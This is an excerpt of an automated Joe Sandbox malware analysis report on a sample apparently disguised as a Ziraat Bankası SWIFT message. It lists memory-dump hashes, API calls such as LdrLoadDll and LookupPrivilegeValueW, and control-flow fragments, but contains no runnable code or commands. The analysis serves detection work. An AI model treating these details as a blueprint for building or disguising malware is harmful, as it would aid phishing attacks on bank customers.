                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 7bb17d742980d329b91939edad69f2bedfc42760fd280e41bc4e65ab25cb6d9b
                                                                    • Instruction ID: c0a67213e876ddc94ff44a26181adf9b9571e8130a3221a5a2f75721572d34a8
                                                                    • Opcode Fuzzy Hash: 7bb17d742980d329b91939edad69f2bedfc42760fd280e41bc4e65ab25cb6d9b
                                                                    • Instruction Fuzzy Hash: 639002B120100402D140719944087560045A7D1381F51C111AA058664EC6998EED76A5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 660219a38aa86ade16f61d007dab1aca53e9c9ff204866a8fb78c7908ba94ead
                                                                    • Instruction ID: 25d3dc18543222bc226cfe4ad701c217de339c281b13f7a78db9e78f92bf21e0
                                                                    • Opcode Fuzzy Hash: 660219a38aa86ade16f61d007dab1aca53e9c9ff204866a8fb78c7908ba94ead
                                                                    • Instruction Fuzzy Hash: B9900265211000030105A59907085170086A7D63D1351C121F6009660CD66189796161
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 13feea0b32cf973258a9d61647cf1d74f976ec3f6d8f28c89bd11bd8b8d9fd5b
                                                                    • Instruction ID: f827235518f72a7f2a7cd8b4585fce2c55a9ab870967542bb86f9271b82ec0f8
                                                                    • Opcode Fuzzy Hash: 13feea0b32cf973258a9d61647cf1d74f976ec3f6d8f28c89bd11bd8b8d9fd5b
                                                                    • Instruction Fuzzy Hash: D190026160100502D10171994408626004AA7D13C1F91C122A6018665ECA658AAAB171
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 84aded9cb54dc91b819f10dc97324d4bd3d7eada56877bebba1b52df511fcd7e
                                                                    • Instruction ID: bef7ba3e9815b109828608e67f244e5e57fe8e431f3f91bcd85f29a57f8d1435
                                                                    • Opcode Fuzzy Hash: 84aded9cb54dc91b819f10dc97324d4bd3d7eada56877bebba1b52df511fcd7e
                                                                    • Instruction Fuzzy Hash: 6D900261242041525545B19944085174046B7E13C1791C112A6408A60CC566996EE661
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 26aa57875df19c4aae09854d89cbe645802194d7dbeab1a57e6b640c616a3703
                                                                    • Instruction ID: 59582e93a4f2b8ff026664278bfab83939b668397f0134720f2fac7466491af9
                                                                    • Opcode Fuzzy Hash: 26aa57875df19c4aae09854d89cbe645802194d7dbeab1a57e6b640c616a3703
                                                                    • Instruction Fuzzy Hash: 6C90027120100413D111619945087170049A7D13C1F91C512A5418668DD6968A6AB161
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 453a1027033e125f283cfeb07e69ddba1e67f54c418d8ef292fc6cbbfc337b9e
                                                                    • Instruction ID: 8bae8b49cea459c22722bfb571b02aa536d9146785cf1ec7446fd74d5bb2cfac
                                                                    • Opcode Fuzzy Hash: 453a1027033e125f283cfeb07e69ddba1e67f54c418d8ef292fc6cbbfc337b9e
                                                                    • Instruction Fuzzy Hash: 7290026921300002D1807199540C61A0045A7D2382F91D515A5009668CC955897D6361
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: fdcf314f693dcb38e55cb396c5575e6d359a34f9a33c80fb60338c83216b57dd
                                                                    • Instruction ID: be3ce218bbf776591d00267c21f068cd6729aac63d2bcb0d7a527258008e5d6e
                                                                    • Opcode Fuzzy Hash: fdcf314f693dcb38e55cb396c5575e6d359a34f9a33c80fb60338c83216b57dd
                                                                    • Instruction Fuzzy Hash: B690026130100003D1407199541C6164045F7E2381F51D111E5408664CD955896E6262
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 9aee380747773235e89c6532043fbc3d93feeae95382f8ee55d46e6bbdb0c276
                                                                    • Instruction ID: 728c84c82ce69c5de3b9ea38c88e8e582ab7cebf0184faaf8b87319b51376e91
                                                                    • Opcode Fuzzy Hash: 9aee380747773235e89c6532043fbc3d93feeae95382f8ee55d46e6bbdb0c276
                                                                    • Instruction Fuzzy Hash: 1290027131114402D110619984087160045A7D2381F51C511A5818668DC6D589A97162
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 4ce253358004d4310ea07fa1bae9ea9d14346622ede73bd6b1ddffb5c2e8785c
                                                                    • Instruction ID: 4fcf1ab5422ba200f23f3f4c5d2b7e2de0ea2edc15f0f70b43ab4f30021315b9
                                                                    • Opcode Fuzzy Hash: 4ce253358004d4310ea07fa1bae9ea9d14346622ede73bd6b1ddffb5c2e8785c
                                                                    • Instruction Fuzzy Hash: 2990027120100402D10065D9540C6560045A7E1381F51D111AA018665EC6A589A97171
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 1929ea10d68b3098ceac97e2ee4a910a317686497f7341ac464589112af8b7de
                                                                    • Instruction ID: 6e55cf9ecf6c0dd0d2ca79c131fd3c9bd80e851aee30bf829a01120951751849
                                                                    • Opcode Fuzzy Hash: 1929ea10d68b3098ceac97e2ee4a910a317686497f7341ac464589112af8b7de
                                                                    • Instruction Fuzzy Hash: 1590027120108802D1106199840875A0045A7D1381F55C511A9418768DC6D589A97161
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 75b6b1daa0cea681f0aa6b25c8af44f541ccbb35ce17ba2765794c49247859fa
                                                                    • Instruction ID: 8a269b114d62fb0afead7509322cc703d795562e47fcffdeafc1662ae4cfec49
                                                                    • Opcode Fuzzy Hash: 75b6b1daa0cea681f0aa6b25c8af44f541ccbb35ce17ba2765794c49247859fa
                                                                    • Instruction Fuzzy Hash: 8E90027120140402D1006199481871B0045A7D1382F51C111A6158665DC665896975B1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 26795d76b449366ce5471f0b773aad25a89e7d9bf1cc83783b159ad8ff1114cb
                                                                    • Instruction ID: 88d89b5a93e372a4e84e2193eb4505eed67cfb02ded18c74ccfbf1a2d44d1a42
                                                                    • Opcode Fuzzy Hash: 26795d76b449366ce5471f0b773aad25a89e7d9bf1cc83783b159ad8ff1114cb
                                                                    • Instruction Fuzzy Hash: CF90026160100042414071A988489164045BBE2391751C221A598C660DC599897D66A5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: de4dcf533129393438c3cb98a06ae0c2bd218045dd0d18db67c5ff228a1dd220
                                                                    • Instruction ID: 98dc01b99683be868e95991aceaca76167560267beff6c61491cc8353f788467
                                                                    • Opcode Fuzzy Hash: de4dcf533129393438c3cb98a06ae0c2bd218045dd0d18db67c5ff228a1dd220
                                                                    • Instruction Fuzzy Hash: D690026121180042D20065A94C18B170045A7D1383F51C215A5148664CC95589796561
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 46c5c95f18af89db95e2a59d7995a132af7dd3e6f74091e00fcf0bf3c168bbc5
                                                                    • Instruction ID: fe93457a4fcad1289ec6382bf934db5aea854220ef0c0c432154f865c6ada710
                                                                    • Opcode Fuzzy Hash: 46c5c95f18af89db95e2a59d7995a132af7dd3e6f74091e00fcf0bf3c168bbc5
                                                                    • Instruction Fuzzy Hash: D190027120100802D1807199440865A0045A7D2381F91C115A5019764DCA558B6D77E1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 329 408d77-408dc1 call 41fac7 call 4205b7 call 40c307 call 418a77 338 408dc3-408dd5 PostThreadMessageW 329->338 339 408df5-408df9 329->339 340 408df4 338->340 341 408dd7-408df1 call 40ba67 338->341 340->339 341->340
                                                                    APIs
                                                                    • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 00408DD1
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.372243150.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_401000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: MessagePostThread
                                                                    • String ID:
                                                                    • API String ID: 1836367815-0
                                                                    • Opcode ID: c4d16ae37389ef09eac909d5272846408838fe98483ecd75000bda51f3cfaadd
                                                                    • Instruction ID: 9b2f64ce684f93b502d75ec29258fbde9be614fb24098ec383e8a7769ae76d88
                                                                    • Opcode Fuzzy Hash: c4d16ae37389ef09eac909d5272846408838fe98483ecd75000bda51f3cfaadd
                                                                    • Instruction Fuzzy Hash: CA018831A4022877E720A6959C43FFE766C9F40B55F04412EFF04BA1C1EAA8690547E9
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 344 41e0d2-41e0d4 345 41e0d6-41e0ee call 41eae7 344->345 346 41e149-41e15e call 41eae7 344->346 350 41e0f3-41e108 call 18d96e0 345->350 349 41e163-41e178 RtlAllocateHeap 346->349 351 41e10a-41e10c 350->351
                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(0041812D,?,004188D4,004188D4,?,0041812D,?,?,?,?,?,00000000,00000005,00000206), ref: 0041E174
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.372243150.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_401000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1279760036-0
                                                                    • Opcode ID: f4d03e2e8fa3cdb09a35f5c6d81dbe72b2be825d5730e47b6810244a24905ff7
                                                                    • Instruction ID: b924fb1ca45e438c3933470b716f091d31ad4f393448f93eda3ee240558497c0
                                                                    • Opcode Fuzzy Hash: f4d03e2e8fa3cdb09a35f5c6d81dbe72b2be825d5730e47b6810244a24905ff7
                                                                    • Instruction Fuzzy Hash: DC0108B5200204AFDB14DF9ADC85ED73BA9AF88754F118559BE099B342C634E910CBB4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 366 40c307-40c323 367 40c32b-40c330 366->367 368 40c326 call 420807 366->368 369 40c332-40c335 367->369 370 40c336-40c344 call 420c27 367->370 368->367 373 40c354-40c365 call 41f087 370->373 374 40c346-40c351 call 420ea7 370->374 379 40c367-40c37b LdrLoadDll 373->379 380 40c37e-40c381 373->380 374->373 379->380
                                                                    APIs
                                                                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040C379
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.372243150.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_401000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Load
                                                                    • String ID:
                                                                    • API String ID: 2234796835-0
                                                                    • Opcode ID: ca96a5e8033b6ad7c61fa57df96aefaf7a797af34e398c22907a0c48103412d1
                                                                    • Instruction ID: 1b99eda0b8fa07d99fc43174098eccb2830ca29732bffb80514493b27d588fe9
                                                                    • Opcode Fuzzy Hash: ca96a5e8033b6ad7c61fa57df96aefaf7a797af34e398c22907a0c48103412d1
                                                                    • Instruction Fuzzy Hash: 9A0100B5E40109ABDB10DBA5DC82F9EB7B89F54304F0082A5A908A7281F635EB598795
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 387 41e17a-41e19e call 41eae7 390 41e1a3-41e1b8 RtlFreeHeap 387->390
                                                                    APIs
                                                                    • RtlFreeHeap.NTDLL(00000060,00000005,00000000,00000000,00000005,00000060,00000000,00000000,?,?,00000000,00000206,?), ref: 0041E1B4
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.372243150.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_401000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FreeHeap
                                                                    • String ID:
                                                                    • API String ID: 3298025750-0
                                                                    • Opcode ID: a0e013fa50e8d9fc093a3aecfd43b3b7aae7825d69be7aea62f1adcc3f08fb8f
                                                                    • Instruction ID: 60d878e21cb03b8b4e7ef6500c3a833aac3398b8826212f44355319d098c5975
                                                                    • Opcode Fuzzy Hash: a0e013fa50e8d9fc093a3aecfd43b3b7aae7825d69be7aea62f1adcc3f08fb8f
                                                                    • Instruction Fuzzy Hash: 20E06DB2300204AFD724EF85CC45ED77768EF58754F114549F9095B242D535E905CBB0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 391 41e2e2-41e301 call 41eae7 393 41e306-41e31b LookupPrivilegeValueW 391->393
                                                                    APIs
                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,0040F379,0040F379,?,00000000,?,?), ref: 0041E317
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.372243150.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_401000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: LookupPrivilegeValue
                                                                    • String ID:
                                                                    • API String ID: 3899507212-0
                                                                    • Opcode ID: 79bacbbed1b8f302d722fb161ce7a73c74adf4e37c015add5f7b4f725dd1fc13
                                                                    • Instruction ID: abaf56558fe3f78932c8bb14cc674d3d4ebe35a1a0169092bb9fe73716b5b3ad
                                                                    • Opcode Fuzzy Hash: 79bacbbed1b8f302d722fb161ce7a73c74adf4e37c015add5f7b4f725dd1fc13
                                                                    • Instruction Fuzzy Hash: 5AE092B53002046FDB10DF65CC41EE73BA9EF48254F144168FD0DA7241C235A801CBA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(0041812D,?,004188D4,004188D4,?,0041812D,?,?,?,?,?,00000000,00000005,00000206), ref: 0041E174
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.372243150.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_401000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1279760036-0
                                                                    • Opcode ID: 71d30878ffc0fd6371cee718eb9878eb3463dfa7e001799ef66c66478ee65a27
                                                                    • Instruction ID: a27e3798eb6d3246d74444c3109f3ac0f6766777780a7a99e869c35af082081b
                                                                    • Opcode Fuzzy Hash: 71d30878ffc0fd6371cee718eb9878eb3463dfa7e001799ef66c66478ee65a27
                                                                    • Instruction Fuzzy Hash: DFE046B5200208ABDB18EF9ADC45EE73BACEF88754F018159FE095B242C630F910CBB0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • RtlFreeHeap.NTDLL(00000060,00000005,00000000,00000000,00000005,00000060,00000000,00000000,?,?,00000000,00000206,?), ref: 0041E1B4
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.372243150.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_401000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FreeHeap
                                                                    • String ID:
                                                                    • API String ID: 3298025750-0
                                                                    • Opcode ID: 7383604f3fe5c795b9236c36b71377a732ea8f0b598dae172b24566b996ec6fa
                                                                    • Instruction ID: 09a980ee748928bc40079a8551e52fc5248c8fae99ea804903dddf60fe5ef7ae
                                                                    • Opcode Fuzzy Hash: 7383604f3fe5c795b9236c36b71377a732ea8f0b598dae172b24566b996ec6fa
                                                                    • Instruction Fuzzy Hash: DFE04FB52002046BDB14DF49DC49ED737ACEF88754F014155FD0957241C530F914CBB0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,0040F379,0040F379,?,00000000,?,?), ref: 0041E317
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.372243150.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_401000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: LookupPrivilegeValue
                                                                    • String ID:
                                                                    • API String ID: 3899507212-0
                                                                    • Opcode ID: 6915fa93d7270e13bfd703e99c47af289f1ee2615e020f739a89d4d612532f61
                                                                    • Instruction ID: 2f9c67764ac3a4ff0dc5b48f72979064fdc544eff6d56503816a6de016206cb0
                                                                    • Opcode Fuzzy Hash: 6915fa93d7270e13bfd703e99c47af289f1ee2615e020f739a89d4d612532f61
                                                                    • Instruction Fuzzy Hash: 76E01AB52002086BDB10DF49CC45EE737ADAF88654F118159BE0957241C634E810CAB5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 394 40f527-40f540 395 40f546-40f54b 394->395 396 40f541 call 418a77 394->396 397 40f54d-40f54e 395->397 398 40f54f-40f560 GetUserGeoID 395->398 396->395
                                                                    APIs
                                                                    • GetUserGeoID.KERNELBASE(00000010), ref: 0040F551
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.372243150.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_401000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: User
                                                                    • String ID:
                                                                    • API String ID: 765557111-0
                                                                    • Opcode ID: b676edfe2508a8d70ab7f268ccbfcaedfa520e2aec845d585ee564f1f09c2cf8
                                                                    • Instruction ID: 3a1d2ef0c60c757c0f72a0a3003fad6eb55e58fc730c6d937a84e79b7af20ed7
                                                                    • Opcode Fuzzy Hash: b676edfe2508a8d70ab7f268ccbfcaedfa520e2aec845d585ee564f1f09c2cf8
                                                                    • Instruction Fuzzy Hash: 1FE0C23338030427F62095A98C42FB6328E5B84B04F048475F908E72C1D5A9E5805014
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • ExitProcess.KERNEL32(?,00000000,?,?,?,00000001), ref: 0041E1EF
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.372243150.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_401000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExitProcess
                                                                    • String ID:
                                                                    • API String ID: 621844428-0
                                                                    • Opcode ID: 0c6232b6cdbf6635767260dc15682acedaa1cab9f782f361699728f7b20cdda3
                                                                    • Instruction ID: 54effc0fb69a626f167bd0d9dd5953a702826966514bf6dcbb5921d7a0768bbd
                                                                    • Opcode Fuzzy Hash: 0c6232b6cdbf6635767260dc15682acedaa1cab9f782f361699728f7b20cdda3
                                                                    • Instruction Fuzzy Hash: 15D012757002187BDA20DB99CC45FD7779CEF45794F154065BA4D5B641C534BA00C7E1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • ExitProcess.KERNEL32(?,00000000,?,?,?,00000001), ref: 0041E1EF
                                                                    Memory Dump Source
